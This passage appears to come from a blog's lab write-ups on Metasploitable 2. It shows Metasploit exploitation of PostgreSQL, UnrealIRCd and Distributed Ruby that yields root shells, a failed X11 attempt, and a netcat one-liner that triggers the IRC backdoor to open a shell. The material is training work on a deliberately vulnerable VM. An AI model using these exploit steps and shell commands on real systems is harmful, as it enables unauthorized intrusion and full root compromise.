   Name    |  Owner   | Encoding |   Access privileges   
-----------+----------+----------+-----------------------
 postgres  | postgres | UTF8     | 
 template0 | postgres | UTF8     | =c/postgres          +
           |          |          | postgres=CTc/postgres
 template1 | postgres | UTF8     | =c/postgres          +
           |          |          | postgres=CTc/postgres
(3 rows)

postgres=#

Below is a video demonstrating the above with additional post exploitation maneuvers:

Now we have the password we can also use Metasploit to obtain a Meterpreter shell:

msf > use exploit/linux/postgres/postgres_payload
msf exploit(postgres_payload) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(postgres_payload) > show options

Module options (exploit/linux/postgres/postgres_payload):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD                   no        The password for the specified username. Leave blank for a random password.
   RHOST     192.168.1.103    yes       The target address
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output

Exploit target:

   Id  Name
   --  ----
   0   Linux x86

msf exploit(postgres_payload) > set PASSWORD postgres
PASSWORD => postgres
msf exploit(postgres_payload) > set PAYLOAD linux/x86/meterpreter/bind_tcp
PAYLOAD => linux/x86/meterpreter/bind_tcp
msf exploit(postgres_payload) > exploit

[*] Started bind handler
[*] 192.168.1.103:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/fTDEMbhY.so, should be cleaned up automatically
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.78:49575 -> 192.168.1.103:4444) at 2013-11-20 08:04:41 +0000

meterpreter >

It’s worth noting at the outset of this post that I was unsuccessful in exploiting this X11 service, but will document my efforts nonetheless.

The Nmap scan of Metasploitable 2 revealed:

PORT STATE SERVICE VERSION
6000/tcp open X11 (access denied)

The Nessus scan on this port detailed the following:

Port 6000/tcp
10407 – X Server Detection     [-/+]

Synopsis
An X11 server is listening on the remote host

Description
The remote host is running an X11 server. X11 is a client-server protocol that can be used to display graphical applications running on a given host on a remote client.

Since the X11 traffic is not ciphered, it is possible for an attacker to eavesdrop on the connection.

Solution
Restrict access to this port. If the X11 client/server facility is not used, disable TCP support in X11 entirely (-nolisten tcp).

So Nessus is reporting the possibility of sniffing traffic. We can scan this service using Metasploit:

msf exploit(postgres_payload) > use auxiliary/scanner/x11/open_x11
msf auxiliary(open_x11) > show options

Module options (auxiliary/scanner/x11/open_x11):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    6000             yes       The target port
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(open_x11) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf auxiliary(open_x11) > exploit

[*] 192.168.1.103 Access Denied
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(open_x11) >

Metasploit is reporting “access denied”.

Everything I’ve read online relating to exploiting this service relies on open authentication, which in this instance does not appear to be the case.

The Metasploit: The Penetration Tester’s Guide advises using the xspy sniffing tool to detect keystrokes, as the X system handles the GUI including the mouse and keyborad; however, again, this relies on unauthenticated access to the system and so as expected this technique failed:

# xspy 192.168.1.103
Client is not authorized to connect to Serverxspy: can't open display 192.168.1.103:0
blah....

# xspy -display 192.168.1.103 -delay 100 -up
xspy: can't open display -display:0
blah....

As I’m not sure how to progress this one; I admit defeat at this point.

The Nmap scan of Metasploitable 2 revealed:

PORT STATE SERVICE VERSION
6667/tcp open irc Unreal ircd
6697/tcp open irc Unreal ircd

UnreaIRCD is an Internet Relay Chat service.

This exploit has been made nice and easy for us:

On port 6667, Metasploitable2 runs the UnreaIRCD IRC daemon. This version contains a backdoor that went unnoticed for months – triggered by sending the letters “AB” following by a system command to the server on any listening port. Metasploit has a module to exploit this in order to gain an interactive shell, as shown below.

Source

The Nessus scan reported:

Port 6667/tcp

46882 – UnrealIRCd Backdoor Detection [-/+]

Synopsis
The remote IRC server contains a backdoor.

Description
The remote IRC server is a version of UnrealIRCd with a backdoor that allows an attacker to execute arbitrary code on the affected host.

See Also
http://seclists.org/fulldisclosure/2010/Jun/277
http://seclists.org/fulldisclosure/2010/Jun/284
http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt

Solution
Re-download the software, verify it using the published MD5 / SHA1 checksums, and re-install it.

Risk Factor
Critical

CVSS Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSS Temporal Score
8.3 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

References
BID 40820
CVE CVE-2010-2075
XREF OSVDB:65445

Exploitable with
CANVAS (true)Metasploit (true)

Plugin Information:
Publication date: 2010/06/14, Modification date: 2013/02/06
Ports
tcp/6667

The remote IRC server is running as :

uid=0(root) gid=0(root)

As this Nessus scan advises us that this is exploitable via Metasploit, let’s give it a go:

msf > search ircd
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                                        Disclosure Date  Rank       Description
   ----                                        ---------------  ----       -----------
   exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  6667             yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler
[*] Connected to 192.168.1.103:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo kt8lsphf0nxKGdOA;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "kt8lsphf0nxKGdOA\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.78:4444 -> 192.168.1.103:39851) at 2013-11-20 12:33:44 +0000

whoami
root

Success.

As this exploit is triggered by sending the letters “AB” following by a system command to the server on any listening port, we can achieve root manually using Ncat. In the Terminal we input:

# echo "AB;nc -l -e /bin/sh -p 12345" | ncat 192.168.1.103 6697
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Found your hostname (cached)

Then we open Ncat and connect to the backdoor using another terminal:

# ncat 192.168.1.103 12345
whoami
root

Job done.

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
8787/tcp  open  unknown

As we can see this Nmap scan did not recognise the service signature running on port 8787 and so I threw a more robust Nmap version detection scan at this:

~# nmap -p 8787 -sV --version-all 192.168.1.103

Starting Nmap 6.25 ( http://nmap.org ) at 2013-11-20 14:03 GMT
Nmap scan report for Unknown-00:0c:29:72:05:d6.home (192.168.1.103)
Host is up (0.081s latency).
PORT     STATE SERVICE VERSION
8787/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port8787-TCP:V=6.25%I=9%D=11/20%Time=528CC14C%P=x86_64-unknown-linux-gn
SF:u%r(GenericLines,3AB,"\0\0\0\x03\x04\x08F\0\0\x03\xa0\x04\x08o:\x16DRb:
SF::DRbConnError\x07:\x07bt\[\x17\"//usr/lib/ruby/1\.8/drb/drb\.rb:573:in\
SF:x20`load'\"7/usr/lib/ruby/1\.8/drb/drb\.rb:612:in\x20`recv_request'\"7/
SF:usr/lib/ruby/1\.8/drb/drb\.rb:911:in\x20`recv_request'\"

The service is still unknown; however, we have some interesting output within the fingerprint which indicates a Ruby program and "DRB" (Distributed Ruby Service) which we can use as a search term within Metasploit:

msf > search drb
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                                                   Disclosure Date  Rank       Description
   ----                                                   ---------------  ----       -----------
   exploit/linux/misc/drb_remote_codeexec                 2011-03-23       excellent  Distributed Ruby Send instance_eval/syscall Code Execution
   exploit/multi/misc/wireshark_lwres_getaddrbyname       2010-01-27       great      Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
   exploit/multi/misc/wireshark_lwres_getaddrbyname_loop  2010-01-27       great      Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)

The drb_remote_codeexec is the most promising and so we’ll run with that:

msf > use exploit/linux/misc/drb_remote_codeexec
msf exploit(drb_remote_codeexec) > show options

Module options (exploit/linux/misc/drb_remote_codeexec):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   URI                    yes       The dRuby URI of the target host (druby://host:port)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(drb_remote_codeexec) > set URI "druby://192.168.1.103:8787"
URI => druby://192.168.1.103:8787
msf exploit(drb_remote_codeexec) > exploit

[*] Started reverse double handler
[*] trying to exploit instance_eval
[*] instance eval failed, trying to exploit syscall
[*] payload executed from file .EbA8isJbAjsgcmD8
[*] make sure to remove that file
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo en2vfxLYQpig5Eku;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "en2vfxLYQpig5Eku\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.70:4444 -> 192.168.1.103:47082) at 2013-11-20 16:26:55 +0000

whoami
root

And we have root.

It has been rather enjoyable and satisfying hacking my way through Metasploitable 2. The process has consolidated some rather disparate knowledge in my brain and I’ve learned loads. I thoroughly recommend it for us noobies.

Below are links to all of my posts on hacking Metasploitable 2. Most of my endeavours were successful and a few weren’t, but I document the failures as I still gained from the process and perhaps others might have more success and let me know how they cracked it.

Firstly here is the Nmap port scan link that provided my attack vectors:

Secondly, the Nessus scan proved invaluable.

Here are the links:

Metasploitable 2: Exploiting FTP server vsftpd backdoor

Metasploitable 2 – Open SSH: Bruteforcing and Debian OpenSSL Predictable PRNG

Metasploitable 2: Port 23 Open Telnet

Metasploitable 2: Port 25 Open SMTP Postfix SMTPD

Metasploitable 2: Port 53 ISC BIND 9.4.2 – Domain Name Server Cache Poisoning

Metasploitable 2: Apache killer DOS

Metasploitable 2: RPC (Remote Procedure Call) Server

Metasploitable 2: Samba Server

Metasploitable 2: Remote Access Ports 512, 513 & 514

Metasploitable 2: Java RMI (Remote Method Invocation)

Metasploitable 2: Port 1524 ingreslock Backdoor

Metasploitable 2: Port 2121 – ProFTPD 1.3.1

Metasploitable 2: Port 3306 MySQL

Metasploitable 2: Port 3632 distccd Exploit and Privilege Escalation

Metasploitable 2: Port 5432 – PostgreSQL

Metasploitable 2: Port 5900 – VNC

Metaspolitable 2: Port 6000 – X11 Server

Metasploitable 2: UnreaIRCD IRC daemon

Metasploitable 2: Port 8787 Open and Unknown

Having completed my incursion into Metasploiitable 2 I’m beginning my foray into Mutillidae II.

Before starting the manual hands-on stuff I thought I’d throw some automated scanners at the web app for fun and see what results they might generate for me.

Mutillidea version 2.6.5 is hosted on my Windows 7 system using XAMPP and i’m scanning from Kali Linux.

I was keen to use Metasploit for this and discovered the WMAP module and followed instructions given here.

Once the scan was complete I looked for vulnerabilities but Metasploit came back empty.

I followed the instructions given in the below video:

And Metasploit still generated no vulnerability results; however, looking at this video closely I noted the professional version is used.

Looking back through the output generated during the scan there appears errors that begin: /opt/metasploit/apps/pro which indicates the “pro” version is needed for this.

Looking at Metasploit’s web gui and clicking the “web Apps” tab it talks of upgrading to the pro version for use.

Metasploit’s website details the differences between the versions and it’s clear that web app testing only comes with the pro version.

Although it’s a shame there are no Metasploit feature for web app testing in the community version, there are plenty of open source scanners and Metasploit’s free version does come packed with goodies.